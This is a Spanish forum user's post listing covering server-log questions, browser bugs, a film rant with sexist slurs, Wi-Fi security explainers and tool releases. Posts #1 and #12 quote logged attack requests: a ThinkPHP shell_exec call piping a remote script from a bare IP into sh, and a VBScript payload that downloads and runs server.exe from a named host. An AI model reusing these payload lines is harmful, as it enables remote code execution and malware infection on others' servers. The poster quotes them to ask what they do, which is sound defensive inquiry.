Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - warcry.

#1
Últimamente me están lanzando al servidor web, bastantes peticiones del tipo:

Requested GET /?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl+--user-agent+curl_tp5+http://31.210.20.181/ldr.sh|sh


Una rápida búsqueda en google, me dice que pueden ser originadas por alguna de las herramientas de Yii PHP framework

el código de la petición entiendo que es básicamente que descargue un script y lo ejecute.

a ver si alguien tiene mas conocimientos sobre el tema
#2
Bueno para el que no lo conozca Brave Browser es sucedáneo de Chrome coloquialmente hablando.

La realidad es que es un navegador en base a chromium al que se le pueden configurar una serie de opciones de privacidad y bloqueo de anuncios de manera sencilla.

Pero recientemente me he encontrado con este error.

Cuando visitamos una pagina que considera no segura, te muestra un warning, hasta ahí todo normal, cuando damos a detalles o a configuración avanzada dependiendo del error nos pone proceder al sitio o visitar este sitio inseguro, pues clickamos y no pasamos de ahí, mientras que abajo a la izquierda pone Chrome-error://chromewebdata/#



Bien según he leído en la comunidad brave se trata de un error de traducción.

Por tanto, hasta que lo arreglen con una actualización, la única manera de solucionar este fastidioso bug es configurar el navegador en su idioma original.

Espero que os sirva, un saludo ;)
#3
No suelo abrir temas en el offtopic, pero esto es que clama al cielo.

Que decepción me he llevado al ver Los Vengadores Endgame, normalmente no escribo cosas así en el foro, pero tengo que sobrellevar el sock que me ha producido el ver esta película.



Vamos como es habitual a poner en contexto el asunto, no soy lector de comics, por lo que no tengo prejuicios puristas de las adaptaciones de los comics al cine que ha hecho Marvel, en cambio si he visto las 22 películas que hasta hoy componen la saga, incluso el bodrio de Pantera Negra, tampoco había visto trailers o comentarios, así que el otro día en casa, en la soledad y oscuridad del salón me puse a ver Los Vengadores Infinity War (error) y acto seguido Los Vengadores Endgame.

Al igual que en la película de Clint Eastwood, Cometieron dos errores, primer error colgar a un inocente, y segundo error, no terminar el trabajo, yo cometí mis dos errores, ver Infinity War primero, un peliculón como la copa de un pino, que aunque tiene cosas para sacarle punta a la película, como lo gay que se vuelve visión si lo comparamos con el visión de la era de ultron, se le perdona cualquier error a este pedazo de película, segundo error, terminar de ver Endgame, ahí perdí toda mi inocencia, esperanzas, sueños e ilusiones. Solo me consuela el hecho que no pagué la entrada de un cine para ver este fiasco que es esta peli de los vengadores Endgame.

Una vez que he puesto al lector en contexto, vamos a desgranar esta gran decepción de película, para lo cual seguiremos la línea argumental de la película, que se resume un poco en que los supervivientes localizan y matan thanos, pasan 5 años aparece AntMan, regresan al pasado a distintos años y lugares y consiguen las gemas del infinito, chasquean los dedos y todo el mundo que se había cargado Thanos en Infinity War revive, como se les cuela un Thanos del pasado por la máquina del tiempo, se produce una gran batalla, donde nos meten de lleno el movimiento feminista #Metoo y el sacrificio final de Iron Man para salvar la situación.

Empezamos a desgranar el film, todo se inicia con el rescate de Iron man y nebula por la capitana marvel, se juntan todos los supervivientes que son el capitán america, Iron Man, hulk, la viuda negra, war machine (cor Rogers), rocket, nebula, thor y la capitana marvel; localizan a Thanos y para sorpresa de todo el mundo resulta que ha destruido las gemas, incluida la gema verde, la del tiempo, y thor se mosquea y le corta la cabeza con el "destructor de tormentas". Ahí tenía que haber dejado de ver la película, era mas de infinity War, y un giro sorprendente de la trama, pero claro ¿y ahora que no está la gema del tiempo que?



Yo no sé si el fallecimiento de Stan Lee afectó a los hermanos Russo, o que cambiaron de camello, porque todo lo que vino después, fue una cagada tras otra.

Pues la trama continua con un "5 años después", ese 5 años después no es vanal, afecta mucho y mal a parte los personajes, capi, war machine, rocket, nebula, y Iron man siguen mas o menos en su línea, pero la viuda negra se humaniza, dentro de lo malo tolerable, pero lo de thor, es increíble, no por el cambio físico, que lo presentan gordo y dejado, sino por el carácter, pasa de ser un dios a un blandengue llorón, y todo porque le ha afectado que hayan eliminado a la mitad del universo cuando a él, ni le va ni le viene el tema, cascó su padre Odín, cascó su madre, cascó su hermano, cascaron sus amigos, cascó su pueblo, cascó su planeta, y ahí estuvo thor el dios del trueno, cascan unos desconocidos que no tienen ninguna relación con él y resulta que se viene abajo, totalmente absurdo y fuera de lugar; los hermanos Russo puestos hasta el culo de sustancias psicotrópicas de mala calidad, hacen de thor el pelele y el graciosillo de la película. Ahora lo que no tiene perdón de dios, es lo que hacen con hulk, resulta que combinan el cuerpo de hulk y la personalidad de baner, haciendo un "porfesor" hulk, ni un puñetazo en toda la película, ni en la batalla final se le ve en acción, por dios, hulk es hulk. Yo creo que en el montaje se dieron cuenta que la habían cagado pero bien como demuestra esta secuencia.

[youtube=640,360]https://www.youtube.com/watch?v=Rb3krwTYtQo&feature=youtu.be[/youtube]

La capitana marvel se hace un cambio de look a lo lesbiana dominante, pero desde el primer momento la presentan en esta película como una borde con la regla y un palo metido en el culo, nada que ver al carácter de su película "capitana marvel" supongo que a exigencias del #Metoo y el colectivo de lesbianas feminazis.

Después del destrozo de personajes hecho con el "5 años después" hay que retomar la línea argumental, Antman sale del mundo cuántico, y tiene la idea de viajar en el tiempo aprovechando ese mundo cuántico, bien, como alternativa a la gema del tiempo está bien, ahora es cuando la cagan, y se nos ponen a emparanollar con escenas de explicación del viaje en el tiempo, donde nos quieren vender su idea espaciotemporal criticando la idea de tiempo lineal como en regreso al futuro, mientras nos venden la multirealidad, vamos una fumada que no entienden todavía ni ellos.

Según y tomando la explicación de la anciana (la de doctor strange) que le hace a baner de la multirealidad, el alterar una realidad para ayudar a su realidad jode la realidad alterada, pues bien, con un par, dicho esto, los hermanos Russo con el subidon del chute, deciden hacer lo que les da la gana, y luego todo queda perdonado porque las gemas las devuelven al momento exacto de donde las cogieron. Pues señores mios, hay una realidad jodida y no resuelta cuando loki se va con el teseracto, otra cuando thor con un par se lleva el martillo de la realidad a la que van, ahora vuélvanse a ver la película thor el mundo oscuro, e imagínense toda la película a thor sin el martillo. Y sin contar otra tercera realidad jodida cuando thanos se va de su realidad por la máquina del tiempo, y lo mejor de todo esto que es para darles unas yoyas bien dadas a los hermanos Russo, si dices que el tiempo no es lineal a lo regreso al futuro, en el final no puedes mandar al pasado al capitán América y traerlo viejecete en la misma realidad porque eso es un concepto de tiempo lineal. En resumen un cacacao que montan que es infumable, lo mires por donde lo mires.

Ahora vamos al momento más tonto y más determinante de toda la película, resulta que cuando van a por la gema del poder war machine y nébula, la nébula del futuro se sincroniza con la nebula de esa época y thanos se entera de todo, bien pues resulta que consiguen la gema de poder, war machine le da al botón para volver al futuro y vuelve, pero nebula en ese instante cortocircuita y se queda inmovilizada, cuando recupera el tipo se va a la nave e intenta avisar a ojo de halcón y a la viuda negra de que thanos sabe que están en su realidad, pues resulta que ve entrar la nave de thanos en el planeta y ve como la cogen en un rayo tractor, y en todo ese tiempo NO ES CAPAZ DE DAR AL BOTONCITO PARA VOLVER AL FUTURO. Argumento total fail, claro si da al botón no hay malo en toda la película, vaya cagadón.

Bueno después de este fallo garrafal en el trama, nos encontramos con el siguiente fallo argumental, el "profesor" hulk se pone el guante con las 6 gemas y desea que resucite todo el mundo, pero en este momento, osea habiendo pasado los 5 años, a ver guionistas, con haber ido justo al momento que thanos pierde la cabeza suficiente, me podéis decir que iron man quería conservar a su hija, pues no es escusa se le dice a baner que desee que todo el mundo resucite y que peper y Morgan y los presentes sean trasportados al día en que thanos pierde la cabeza y que los últimos 5 años no hayan ocurrido obviamente desapareciendo sus homónimos de esa realidad, para no juntarse con dos capitán america, pero claro como el tiempo de multirealidades no se lo creen ni ellos, pues ni piensan en esta fórmula, y luego el amigo gordito de peter Parker, está en el instituto igualito que hace 5 años, venga ya, amen de todas las vidas rotas por todo el universo que dejarían, matrimonios, gente que no encontrarían a sus seres queridos porque en esos 5 años la gente también muere, etc, etc. Vamos otro epic fail de la trama.

Como ya estaban metidos en la espiral de fallos agurmentales, y ya no podían salir, pues de perdidos al rio, nos presentamos en la batalla final, y nos encontramos un thanos del pasado que sin gemas pega unas ostias como panes y es más poderoso que en infinity war con gemas, que un capitán america coge el martillo de thor, lo cual no supone una novedad ya que en los vengadores la era de ultron casi lo coge pero eso de que también lanza rayos, cuando en la película "thor racknarog" thor descubre que el poder del rayo esta en él y no en el martillo, pues que queréis que os diga, seguimos, el capitán america con el martillo, thor con el destructor de tormentas e Iron man no tienen cojones a vencer a ese super thanos sin gemas del pasado. Bueno se produce la batalla de la leche donde intentan darle a cada personaje su minutito de gloria, ¿hulk? ¿Dónde está hulk? Pues eso, ni un manporro, missing. Con esto llegamos al momento #Metoo, o de enaltecimiento del feminacismo, pues deciden llevar el guantelete con las gemas a la furgoneta de antman para mandar las gemas al pasado, ahí veo otro fallo argumental, pero como no he entrado en las partículas pink antes, no voy a entrar ahora, pues nada, la capitana marvel, coge el guantelete y se rodea de todo el reparto femenino de escolta, lo que me da pena de esa escena es que también está la pobrecita mantis y no la veo que su fuerte sea el dar manporros precisamente. El resultado final de la secuencia es que thanos frustra el intento de todas las féminas, asi que sacamos la moraleja de que aunque se unan todas las mujeres no consiguen el objetivo, ya que es iron man quien resuelve la situación, creo que la escena hace un flaco favor al feminismo, tanto por haberla metido con calzador en la batalla provocando la aversión del espectador, que va a ver una película y no a que lo idieologicen y también porque se saca la moraleja de que las mujeres no pueden aunque se unan todas.

Bueno ese intento femdom frustrado da lugar a un combate entre thanos y la capitana marvel, que realmente no se cual es su poder, pero creo que se han pasado tres pueblos con él, porque se lleva una yoya con la gema del poder y sale de rositas.

youtube me bloquea el clip de video por derechos de autor, buscar la lucha capitana marvel-thanos

Recordemos que hace la gema de poder.

[youtube=640,360]https://www.youtube.com/watch?v=2wG5WoUyUw8&feature=youtu.be[/youtube]

Si atendemos a esto, la capitana marvel tenia que haberse volatilizado al instante, creo sinceramente que los de marvel, se estan columpiando con este personaje

En definitiva, una película para olvidar, cagada tras cagada, trágico final de la saga, menos mal que Stan Lee esta muerto y no ha visto este bodrio. Hermanos Russo espero sinceramente que el karma os devuelva todo el mal que intencionadamente le habéis hecho en esta película
#4
Pues como expongo en el título, ojiplático me he quedado cuando me he comprado una tele, voy con mi pincho usb con los capítulos de la serie a la que estoy enganchado, y me dice que no puede leer el archivo y que el motivo es porque tiene codec Xvid y las teles samsung posteriores a 2018 no lo soportan.

a mi ni siquiera me da esta opción

[youtube=640,360]https://www.youtube.com/watch?v=QXGboteB9Es[/youtube]

en definitiva leyendo un poco, la gente esta que trina y con razón.

https://eu.community.samsung.com/t5/Televisi%C3%B3n/televisor-samsung-UE43NU7405-No-reproduce-peliculas-ni-series-en/td-p/701445/page/3

ahora mismo la única solución que he visto es convertir a otro formato los vídeos, pero dependiendo de que programas uses pierdes mas o menos calidad con la conversión.

yo ahora mismo estoy utilizando vlc para convertir los archivos a h264 + mp3 (mp4) manteniendo la pista de video/audio original.

apenas pierde calidad, y va bastante rápida la conversión, aunque algunos capítulos me han dado problema y los he tenido que convertir a mano con ffmpeg

En definitiva, avisados estáis de como se las gastan últimamente los coreanos de samsumg

#5
Buenas

a dia de hoy he recibido desde ip,s rusas dos peticiones Requested GET /?XDEBUG_SESSION_START=phpstorm

he estado leyendo que son para hacer un desbordamiento de pila y ganar acceso a una sesion.

Alguien me puede ampliar información sobre esto.

si por ejemplo, la sesión que se abre es para navegar por los directorios del servidor, o si por el contrario gana control total de la maquina.

thanx
#6
Siempre he mantenido y mantengo que todos los ISP espían a sus usuarios analizando su trafico, donde se conectan, e incluso correlacionan datos personales con la navegación.

Llevaba tiempo sin entrar en mi área de cliente, y según entro me topo con esto.


vamos que ya no se cortan un pelo, y para darse cobertura legal te dicen que aceptes estas condiciones, y seguro que habrá muchos taraos que le habrán dado al botón de aceptar.

en fin, aunque yo no haya dado a aceptar, me seguirán espiando igualmente, vulnerando flagrantemente mis derechos, pero como no puedo demostrarlo porque habría que incautar un nodo, pues a j.oderse toca.

vaya mi.erda de país que tenemos, se estarán forrando los políticos con sobres, mirando para otro lado, mientras las principales teleoperadoras  abusan y espían a sus clientes, por lo menos tenian que tener la decencia de quitar la secretaria de estado de telecomunicaciones, porque para lo que hacen...   :¬¬
#7
Software / La caida en desgracia de Teamviewer
14 Febrero 2019, 11:11 AM
Como si de la historia del Imperio Romano se tratara, en el artículo de hoy vamos a tratar de entender que está pasando con Teamviewer.

Para el que no esté familiarizado con Teamviewer, es una herramienta que te permite controlar remotamente un PC. Según la política de los creadores de la aplicación, esta herramienta es de uso gratuito para uso particular, debiendo comprar una licencia para su uso de manera empresarial/comercial.


Llevo unos años usando Teamviewer para administrar mi pequeño servidor web, en el cual si habeis visitado mi página web, habreis podido observar que no tengo publicidad y que es una simple web de entretenimiento. Por lo que siempre he cumplido con las políticas de los desarrolladores de la herramienta.

Lo que tengo claro, es que nunca recomendaría para uso empresarial una herramienta como Teamviwer, o cualquiera similar perteneciente a terceros, es un fallo de seguridad garrafal, pero hay gente para todo, supongo que ese es el negocio de Teamviewer. Lo normal en una empresa es administrar los equipos por ssh, o si quieres un entorno de escritorio puedes usar vnc, punto a punto sin pasar por servidores de terceros.

Una vez hecha la introducción, entremos en materia, durante el tiempo que he estado usando esta herramienta, en algunas ocasiones me salía un mensajito cuando iniciaba Teamviewer que ponía que se había detectado un posible uso comercial, obviamente lo cual no es cierto, pero no pasaba de ahí, pero ayer empezó a cortarme la conexión cada dos minutos, entonces ¿Qué pasa con Teamviewer? Para responder a esta pregunta, me fui a preguntárselo a Google, y descubrí para mi asombro que desde el 2016 había entradas en este sentido, leyendo una de las entradas, me enteré de que por lo visto hubo una escisión de parte del equipo original de Teamviewer, las comunidades cuando hay pasta de por medio es lo que tiene, y parece ser que el equipo que se quedó a cargo de la aplicación, sobre el papel y de cara a la comunidad no cambió sus políticas de uso, pero la realidad es que quiere que pases por caja y pagues, recurriendo a tretas como la desconexión cada dos minutos de la sesión.

He visto que hay maneras de "resetear" estas limitaciones, que si un crack, que si desinstalando y volviendo a instalar previo cambio de mac, etc. Pero me niego a recurrir a esto cada x tiempo, por la avaricia desmesurada de los que gestionan a día de hoy esta herramienta.

Si Teamviewer esta donde esta, es por la comunidad, dado que siempre hemos puesto esta herramienta de ejemplo, de cómo se puede ganar dinero y además ser gratuita para el común de los mortales. Así se ha extendido y popularizado su uso, pero al igual que le pasó al Imperio Romano los más grandes también caen por una mala gestión.

Ahora, intrigado por saber más sobre la escisión en el equipo de Teamviewer, me topé con que estos miembros que se había separado habían montado una aplicación similar que se llama Anydesk, con las condiciones originarias de Teamviewer. Pues que he hecho, desinstalar Teamviewer de mi servidor y pasarme a Anydesk, que como prácticamente es más de lo mismo, en 2 minutos ya la tenía instalada, configurada y funcionando.


Que Teamviewer gestionado por estos usureros descanse en paz, y a su vez le deseo larga y prospera vida a Anydesk.

fuente yo  ;D

#8
Pues eso, vaya chasco hoy he ido a ver que habia y me he encontrado que la url no existe.

investigando un poco, por lo visto el que la mantenia ha decidido cerrarla.



Una pena, me descargaba de ahí los juegos que me llamaban un poco la atención, aunque últimamente no haya mucho que se adapte a mi gusto, ya que todo esta enfocado al online y a cinemáticas increíbles y a comerse poco la cabeza y aporrear mucho los botones.

El último buen sabor de boca me lo lleve con HORIZON ZERO DAWN, ya que la secuela de Pillars of eternity me decepcionó un poco. (la primera parte para mi es un juegazo)

Pues nada, de momento me queda gamestorrent. Si alguien sabe alguna pagina que este bien en este sentido que no deje de compartirla.
#9
Bueno, hoy estaba aburrido y me ha dado por formatear el pc de casa. Lo hago un par de veces al año, me gusta tanto por hobby como por limpieza y para la actualización de algunas aplicaciones.

El caso es que con la instalacion limpita de windows 10 april update, vamos lo que viene siendo la version 1803, pues resulta que instalo chrome, y se me instala la version 69, en el resto de pc,s que tengo, todavia tengo la 68, incluso alguno la 67

Pues el caso es, que lo primero que te encuentras es que han modificado la interface grafica. Tampoco es un cambio de la leche, pero se nota bastante.


pero esa no es la cuestion, resulta que no puedo navegar, jajajajaja, si, un navegador que no navega por internet.


con edge navego sin problemas, con firefox portable sin problemas pero con chrome, "ERR CONNECTION TIMED OUT"


En definitiva, o el error esta en la nueva version de google chrome, o el sistema operativo no se me ha instalado bien.


a ver si alguien funciona con la version 69 chrome y me cuenta que tal le va.

#10
El navegador Google Chrome identificará como "no seguros" todos los sitios web que utilicen el protocolo de transferencia HTTP a partir de julio de este año 2018, y admitirá solamente aquellas páginas que utilicen el sistema cifrado HTTPS. El bloqueo de páginas HTTP entrará en vigor con la difusión de la nueva versión del navegador de Google, Chrome 68, cuyo lanzamiento está previsto para el mes de julio de 2018.

Así que si te sale esta pantallita pues te han jodido, porque el que no tenga experiencia al respecto pensará que está en un sitio con contenido malicioso.


Así que teniendo en cuenta que Chrome es usado por casi el 60% de los usuarios, pues los chicos de Google me han obligado a actualizarme, para que luego digan que no están en posición de monopolio.


Entonces el que tiene una sencilla web que tiene que hacer, pues existe una opción buena, bonita y barata, más bien a coste cero.

Esta opción se llama Let's encrypt donde si tu servidor web es de la familia unix es relativamente fácil solicitar un certificado ssl para tu dominio, sin datos bancarios, sin nombres, sin dni.

Cuando digo que es relativamente fácil, es porque el soporte mayoritario es para debian y si no te mueves en este entorno, pues te tienes que liar a instalar un montón de dependencias para conseguir hacer funcionar la herramienta certbot.

Mi solución ha sido sencilla, para no liarme ha instalar dependencias, he arrancado una live debian, he añadido la fuente al sources.list

deb-src http://ftp.debian.org/debian jessie-backports main

Y he actualizado la Live

apt-get update && apt-get upgrade -y

Una vez actualizado, he montado mi servidor web sobre debian ya que no utilizo los típicos servidores web como apache, y he instalado certbot.

apt-get install certbot

Después lo ejecutas

certbot certonly --webroot -w /var/www/html -d laurldetudominio

Si tienes subdominios pues los añades después de la url de tu web siempre precedidos de -d

Aceptas los términos, introduces un correo para notificaciones y te crea el certificado que tiene una validez de 90 días.

Es fácil automatizar el proceso con un simple script para que cada x días te renueve el certificado, pero en mi caso al estar en una live y debian no ser mi unix de cabecera pues con un simple Snapshot de vmware suficiente.

fuente yo  ;)
#11
Hacking Wireless / ¿Que es esto del WPA3?
15 Enero 2018, 12:31 PM
En este artículo voy a tratar de explicar que podemos esperar de este nuevo sistema de seguridad.


La Wi-Fi Alliance, que es un conjunto de empresas, ha informado recientemente de un nuevo sistema de seguridad, que podría entrar en funcionamiento este mismo año. No han especificado las nuevas características de este sistema WPA3, por lo que vamos a ciegas.

Analicemos pues lo poco que sabemos, han dicho que aumentarán el cifrado que pasará a 192 bits, ya que el actual cifrado, por métodos de ataque distribuido se vio que podía ser crackeado en un tiempo relativamente viable.

Pero a parte de este aumento en la seguridad de cifrado, que podemos esperar, en principio prometen un sistema de negociación de clave que haga inútil los sistemas actuales de ataque por diccionario contra un handshake, lo que haría que claves poco seguras, bien por su longitud, bien por ser de las más comunes, fueran robustas al no poder probarlas contra un handshake. Pero y ¿los "releavers"? uno de mis script "Airlin" prueba claves contenidas en un diccionario contra el router directamente, luego seguirían siendo eficaces. Luego que nadie se confíe, las claves poco seguras, seguirán siendo poco seguras.

Ahora vienen donde la matan, no han entrado en detalle pero dicen que implantarán un sistema de privacidad de redes abiertas mediante el cifrado de datos individual. Luego hasta el Punto de Acceso tengo un cifrado de datos individual, con eso que evito, pues solamente que quien este escuchando en esa red coja los datos que puedan viajar en claro, que a día de hoy son pocos ya que casi todas las conexiones utilizan el protocolo https, luego es poner una capa de cifrado mas, ¿pero entonces esto realmente vale para algo? Pues no, ya que no previene los ataques MITM ya que se seguirá pudiendo envenenar la red y hacer que todo el tráfico pase por donde queramos.

Y por último anuncian un nuevo proceso simplificado para configurar la seguridad, especialmente accesible para dispositivos con una interface con una visualización limitada o incluso nula. Aquí es cuando me cago de miedo, la última implementación de un sistema simplificado para el usuario fue el WPS, con la cagada en mayúsculas que hicieron, así que preveo que los futuros fallos que se encuentren al WPA3 vendrán de la explotación de este "sistema simplificado".

¿Qué pasará con nuestro hardware? Ordenadores, routers, repetidores, etc. Sin conocer las especificaciones en concreto, con una actualización en los firmwares debería ser suficiente, pero no se por que tengo la sensación, que la Wi-Fi Alliance, intentará implementar algo, aunque no valga para nada, para forzar al usuario a un cambio de equipos, que es con lo que ganan dinero las empresas fabricantes, ya que con la actualización de firmwares no.

Por todo lo expuesto anteriormente, yo no recomendaría el volverse loco con el tema de WPA3 y hacer una inversión ingente de dinero en actualizarse, ya que puede ser peor el remedio que la enfermedad, y todavía podemos aguantar con un sistema WPA2 que ya tiene unos 14 años y que en principio la vulnerabilidad de la negociación del handshake de 4 vías ha sido parcheada sin mayores consecuencias.

fuente yo  ;D
#12
bueno he tenido dos intentonas de ejecucion de codigo en el log del servidor

6:12:08 117.61.135.182:19339 Requested GET /?search=> Set Shell = CreateObject("Wscript.Shell")
> Post.Open "GET","http://yamanbeisi.com/server.exe",0
> Post.Send()
> Set aGet = CreateObject("ADODB.Stream")
> aGet.Mode = 3
> aGet.Type = 1
> aGet.Open()
> aGet.Write(Post.responseBody)
> aGet.SaveToFile "c:\server.exe",2
> wscript.sleep 1000
> Shell.Run ("c:\server.exe").}


esa de las 6:12 de la mañana y otra a las 7:17

en principio creo que no estoy infectado porque el antivirus cuando he hecho la descarga desde la web http://yamanbeisi.com/server.exe me lo detecta, por lo que no creo que se haya ejecutado.

también la segunda intentona supongo que seria porque la primera no ha cuajado.

desde el navegador no he conseguido repetir la secuencia de comandos, ya que lo mas que he conseguido me la muestra el log asi

9:14:34 192.168.0.10:50677 Requested GET /?search=> Set Shell = CreateObject("Wscript.Shell") > Post.Open "GET","http://yamanbeisi.com/server.exe",0 > Post.Send() > Set aGet = CreateObject("ADODB.Stream") > aGet.Mode = 3 > aGet.Type = 1 > aGet.Open() > aGet.Write(Post.responseBody) > aGet.SaveToFile "c:\server.exe",2 > wscript.sleep 1000


el log me lo muestra en una sola linea y en negro, mientras que las intentonas de china me las muestra en azul y con intros, con lo cual no se ahora mismo si mi servidor es vulnerable a que se pueda abrir una shell y ejecutar código.

en principio creo que no, pero estoy con la mosca.

cuando tenga un poco de tiempo intento una conexión desde una shell de linux

en definitiva, hasta que tenga tiempo de crear una sandbox y e intente ver que es lo que hace el "server.exe" que te descargas en la web china, a ver si hay un alma caritativa que analice el malware y si me pone exactamente que es lo que hace se lo agradecería, para ver si hay alguna conexión rara o proceso suplantado o lo que sea que haga y mirar que no se esta ejecutando en mi servidor

thanx


#13
leyendo el periódico me he encontrado con esto, la verdad que me he echado unas risas.

fuente: http://www.elmundo.es/f5/comparte/2017/10/19/59e77fbd22601db82d8b459f.html
#14
Bueno dejo aquí el modulo de reaver 1.6.1, como siempre, lo descargáis del enlace de abajo y lo metéis en la carpeta modules

Este versión de reaver lleva incluido el ataque pixie dust, y que tiene como principal característica el que puedes especificar cualquier tipo de string incluido el valor nulo.

Para mi gusto tiene un problema a la hora de localizar el AP, con lo cual si especificáis el canal mejor.

He mantenido los otros reaver tradicionales y a la hora de invocar el comando de esta versión he respetado como se hace en wifislax.

Os dejo un ejemplo de como se explota una brecha de seguridad de algunos router ZTE




enlace de descarga pincha aqui

Un saludo
#15
Pues eso, ha empezado el curso escolar y el foro se esta llenando de temas en los que los "vagos" y "perroflautas" quieren echarle morro, y abren y abren temas solicitando que les hagamos los ejercicios de clase. El ultimo, el colega este

http://foro.elhacker.net/redes/ayuda_con_implementacion_de_red-t474842.0.html

Esto empieza a parecer el ricon del vago, y creo que estos temas son basura para el foro.

Puedo entender que alguien se atasque, todos nos topamos con alguna pared de vez en cuando, pero no es lo mismo abrir un tema, diciendo tengo este ejercicio de clase, y he hecho esto, he probado aquello, he cambiado la configuracion infinitas veces y me quedo en que la conexion no pasa de aqui, que pedir que te hagan el ejercicio entero.

lo dicho, a esa gente no me importa ayudarles u orientarles donde pueden tener el fallo, pero los temas en los que te cascan el ejercicio copiado tal cual sin haberlo trabajado esos hay que eliminarlos y bannear a los autores.

yo se que a los amos del offtopic tipo @wozsoft no les gustara porque pierden oportunidades de lucirse y aparentar que saben para que les hagan del staff, pero el controlar y moderar los foros tecnicos para que no se llenen de basura deberia ser prioriatario.

es como yo veo las cosas, por eso planteo la sugerencia, para que lo estudies a ver que os parece a vosotros
#16
Bueno, como ya sabeis no tengo mucha idea de entornos web y demas.

hoy revisando los log de mi servidor me he encontrado esto

45.77.40.86:47094 Requested GET /?tpl=list&folders-filter=\&recursive


en el servidor no hay log de descarga asociado a esta query.

he reproducido el log a traves del navegador (chrome y edge)

127.0.0.1:57410 Requested GET /?tpl=list&folders-filter=\&recursive


y me descarga la web de inicio, y queda el log reflejado en el servidor.

alguien me explica para que es esa query y por que no se ha descargado nada o si se ha descargado algo, por que no aparece en mi servidor?

thanx
#17
Hoy os presentamos la version LiveCD de Wifiway 3.5


Como LiveCD no hay que decir que es compatible con el soporte CD, porque es una Live ligera de menos de 700mb

Es una versión compatible con sistemas x86 (32 bits) y x64 (64 bits)

Tiene soporte UEFI Deshabilitando el SECURE BOOT

Mantiene el tradicional cambios persistentes, para aquellos que les guste utilizarlo

Lleva las herramientas tradicionales para realizar las auditorias a redes WiFi.

Esta versión No da soporte a scripts de ingeniería social tipo, linset, fluxion, etc.

Para usar herramientas adicionales o que no figuren en la LiveCD, tenéis la hermana mayor Wifislax.

Para finalizar, me gustaría dar las gracias a todos los miembros de seguridadwireless, presentes y pasados, ya que esta LiveCD lleva un poquito de todos.

espero que la disfrutéis

IMPORTANTE: Al paquete dhcpd que crea un servidor dhcp le falta un archivo para funcionar correctamente, WAP necesita de este servidor dhcp para funcionar.

Os dejo el fix que corrige el error, lo metéis en la carpeta modules y ya esta. Para aquellos que habéis grabado un cd, la solución es fácil, os vais a la ruta /var/state/dhcp/ y creáis un archivo de texto vacío y lo llamáis dhcpd.leases

https://www.dropbox.com/s/vxps6mks2cmtykc/Fix-dhcpd.xzm?dl=0

Links de descarga en:

Seguridadwireless.net

Un saludo ;)

PD: os dejo un videodemo

#18
Desarrollo Web / Requested GET /?mode=jquery
31 Mayo 2017, 12:48 PM
buenas, como no tengo mucha idea de programación web, vengo con otra duda.

esta noche en mi servidor he recibido esta petición

Requested GET /?mode=jquery

por lo poco que he podido leer es una api ajax, que utiliza js.

hasta ahi pos bien, pero la pregunta que me surge es:

¿que finalidad o que respuesta se espera obtener del servidor web cuando se hace esa petición get con jquery?

¿es simplemente tanteo por si la web tiene javascript o la api ajax?
#19
Hacking Wireless / Conceptos Básicos Wi-Fi
15 Febrero 2017, 21:04 PM
A raíz de un artículo sobre seguridad publicado en un periódico de tirada nacional, en donde el periodista hablaba barbaridades sobre WEP, WPA y WPA2 y por tanto hacia unas recomendaciones de seguridad erróneas, vamos hablar de Wi-Fi.


En la actualidad hay mucho "entendido" del Wi-Fi, estos "expertos" basan su capacidad, o su talento, en saber usar programas y scripts automatizados que explotan las distintas vulnerabilidades existentes. Pero la realidad es que cuando se habla de WEP, WPA, TKIP, CCMP, OPEN, etc. no se sabe de qué se está hablando.

Empecemos:

• WEP (Wired Equivalent Privacy) es el sistema de seguridad/autenticación, que se definió en el estándar 802.11, basado en el algoritmo de cifrado RC4. Creo que a día de hoy todo el mundo sabe, que este sistema tiene fallos de seguridad que hacen relativamente fácil el obtener las claves precompartidas. Para resolver esto sacaron el IEEE 802.11i (Wi-Fi Protect Access).

• WPA (Wi-Fi Protect Access) como acabamos de ver es un estándar, o mejor dicho, es la versión previa de IEEE 802.11i que lo que hace es remplazar al sistema de autenticación que había antes (WEP) por uno nuevo (WPA). Esta transición entre un sistema y otro no fue inmediata por lo que dentro del mismo estándar, existen dos protocolos de cifrado.

       * TKIP (Temporal Key Integrity Protocol) Utiliza el mismo algoritmo RC4 que utilizaba el sistema (WEP) pero construye las claves de forma diferente, lo que hace ineficaces los ataques para WEP existentes. Este sistema de cifrado es vulnerable a ciertos tipos de ataques, que si bien es verdad que estos ataques no comprometen la clave, si pueden comprometer la integridad de los paquetes, pudiendo afectar al normal funcionamiento de la red.

       * CCMP (Counter Mode Cipher Block Chaining Message Authentication Code Protocol) es un sistema mejorado de encapsulación criptográfica de datos, que utiliza el algoritmo de cifrado AES (Advanced Encryption Standard), en la actualidad es el sistema de cifrado más seguro y por tanto es el que deberíamos usar.

De lo anterior, podemos sacar las siguientes definiciones, para hablar con propiedad y no mezclar churras con merinas.

• Sistema de Autenticación: WEP, WPA, WPA2, WPE (WPA Enterprise).

• Protocolo de Cifrado. TKIP, CCMP.

• Algoritmo de cifrado: RC4, AES.

Una vez que tenemos claro esto, vamos a profundizar un poco más.

El estándar IEEE 802.11i define que WPA2 tiene que utilizar CCMP por defecto, pero eso no significa que no se pueda definir WPA2 con cifrado TKIP, al igual que WPA puede trabajar en TKIP, y en CCMP. Dependerá de las opciones que tengas en el router, y las configuraciones que implemente el fabricante, la diferencia con WPA es que WPA no incluye todas las características del IEEE 802.11i al ser una versión de transición para corregir el fallo de seguridad de WEP

Como podéis observar en la siguiente imagen:


Mi router me da las siguientes opciones de seguridad:

• Open: sin seguridad, red abierta

• Shared key: lo que sería el Sistema de Autenticación WEP

• WPA: ya sabemos lo que es

• WPA2: ya sabemos lo que es

• WPA/WPA2: esta opción, permite al router adaptarse a lo demandado por el cliente, esta opción estaba prevista para aquellos dispositivos antiguos que solo trabajan en WPA-TKIP, hoy en día, esta opción debería desecharse en favor de WPA2-CCMP.

En esta imagen, podemos ver el protocolo de cifrado:


• TKIP: Ya sabemos lo que es

• AES: lo define como protocolo de cifrado, cuando lo correcto es CCMP

Aprovechando el tema vamos a ver que es Wi-Fi Protected Setup (WPS).

